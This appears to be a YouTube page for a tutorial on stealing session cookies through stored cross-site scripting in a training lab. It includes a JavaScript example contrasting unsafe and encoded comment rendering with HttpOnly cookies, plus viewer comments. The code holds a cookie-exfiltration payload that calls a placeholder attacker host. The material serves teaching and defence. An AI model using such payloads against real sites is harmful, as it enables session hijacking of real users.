How Hackers Use Stored Cross Site Scripting (XSS) to Steal Session Cookies (and how to mitigate it)

This video demonstration uses the PortSwigger Web Security Academy (a free online training platform) to show how stored cross-site scripting can be used to steal session cookies from users who browse the vulnerable website. Watch until the end to learn how to protect yourself online from this attack and what web developers should be doing to keep their site secure.

Disclaimer: This content is intended to be consumed by cyber security professionals, ethical hackers, and penetration testers. Any attacks performed in this video should only be performed in environments that you control or have explicit permission to perform them on.

00:00 - Intro
00:15 - Identifying the Vulnerability
03:20 - Proof of Concept Payload
04:40 - Stealing Cookies
08:50 - Mitigation
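The chain the video walks through, shown from the developer's side as an added example (this is not code from the video, the blog post, or the PortSwigger lab): a stored comment rendered by string concatenation, the same comment rendered with HTML entity encoding, and a session cookie issued with the HttpOnly flag. The payload, the attacker domain attacker.example, the user names and the cookie values are constructed placeholders. Runs under plain Node.js with no dependencies.

```javascript
// Added example, not from the video or PortSwigger. Shows why a stored XSS payload
// runs in other users' browsers when untrusted text is spliced into HTML, and how
// output encoding plus cookie flags break the cookie-theft chain.

// Constructed comment body as an attacker would submit it to a vulnerable comment
// form. "attacker.example" is a placeholder domain, not a real listener.
const STOLEN_COOKIE_PAYLOAD =
  '<script>fetch("https://attacker.example/?c=" + encodeURIComponent(document.cookie))</script>';

// Vulnerable rendering: stored comment text goes straight into the page markup.
function renderCommentUnsafe(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Minimal HTML entity encoder for the characters that matter in an HTML text context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hardened rendering: every untrusted value is encoded for the context it lands in.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Crude stand-in for "would the browser parse a script element here?": a literal
// "<script" start tag in the emitted markup means the payload is live.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Set-Cookie value for the session cookie. HttpOnly keeps it out of document.cookie,
// so even a successful injection cannot read it; Secure and SameSite limit where the
// browser will send it.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Simulates what document.cookie exposes: only cookies that were set without HttpOnly.
function documentCookieView(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\b/i.test(h))
    .map((h) => h.split(";")[0])
    .join("; ");
}

// Runs the three checks and returns the results so they can be inspected or asserted on.
function demo() {
  const unsafe = renderCommentUnsafe("mallory", STOLEN_COOKIE_PAYLOAD);
  const safe = renderCommentSafe("mallory", STOLEN_COOKIE_PAYLOAD);
  // Constructed response headers: a hardened session cookie and a harmless preference cookie.
  const cookies = [sessionCookieHeader("abc123"), "theme=dark; Path=/"];
  return {
    unsafeHtml: unsafe,
    safeHtml: safe,
    unsafeExecutes: containsScriptTag(unsafe), // true: payload is parsed as a script element
    safeExecutes: containsScriptTag(safe), // false: payload is shown as text
    visibleToScript: documentCookieView(cookies), // "theme=dark": session cookie is hidden
  };
}

console.log(demo());
```

Encoding for the output context is the fix that removes the vulnerability; HttpOnly is defence in depth, since it keeps the session cookie out of `document.cookie` if some other injection slips through, but it does not stop injected script from acting as the victim directly within the page.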

👇 SUBSCRIBE TO INFINITELOGINS YOUTUBE CHANNEL NOW 👇

Blog post mentioned in video:

Mitigation Resources:

Tags: #EthicalHacking #ComputerSecurity #XSS
Comments
Author

Great explanation and example. Looking forward to more content like this from you!

funkykong
Author

At this moment when I liked your video, the ratio is 100:1 (Like:Dislike). Enough to prove your great content. Keep educating us, buddy.

hackyourself
Author

Thanks a lot. I have read the blog and it was more than enough to forge an attack on my lab, of course, but I decided to watch the video for the extra sauce, and you were magnificent. Please excuse my English, and thanks.

youssefblt
Author

Wow! This was awesome! I’m having an issue receiving admin cookies for the eJPT XSS lab. Any other training websites you’d recommend aside from INE? You’re a great teacher! I’m subscribing!

losxlakers
Author

I really enjoy it when you explain the remediation strategy for attacks on your videos. Well done!

cwinfosec
Author

Only tutorial on YouTube that teaches A-Z. ✨

typex
Author

This just helped me finish a challenge at HTB CTF, thanks dude.

NickerTheMighty
Author

Really love the content man. Need more in the future.

abishekbaiju
Author

I was looking for this XSS method without using Burp Collaborator...
Then it's solved now, thanks.

PawMeongs
Author

Great video! I am facing an error while getting the cookie: instead of getting the cookie, I'm getting a different thing like this: "SL_G_WPT_TO=uz; SL_wptGlobTipTmp=undefined". I would be happy if you could solve this problem for me. What should I do?

pzerman
Author

Very concise explanation that helped clear up a couple concepts for me. Thank you very much!!

xtwistedx
Author

You are 💎. This is such a simple and in-depth explanation. Thank you !!

balbeerkumar
Author

I am a lay person. You talk about one cookie. Session cookie: is it only for one login into a particular website, or is it all session cookies that exist in the browser at the given time?

D.von.N
Author

Fantastic video! Thank you for the explanation.

camelotenglishtuition
Author

But... how to do it if it becomes text and not executed code? 🤔

cr_cryptic
Author

Hi. On the query strings part I don't see any session information. What may be the reason? Please help, it's for my school project :(

knntzmn
Author

Does doing an XSS require that the query section of any website has sent our query? I have to do an XSS, but in the query section of the site, when completing it with the data and pressing send, nothing happens.

matiasmunoz
Author

Can you show how to mitigate a stored XSS attack using a hybrid analysis approach?

geethakulal
Author

Mind blowing! How can I, as a user, protect myself from this attack if a website I visit is vulnerable?

DogmaFight
Author

Hey man. Not sure if you’re still on but nice work. I’m just learning XSS

laynehoon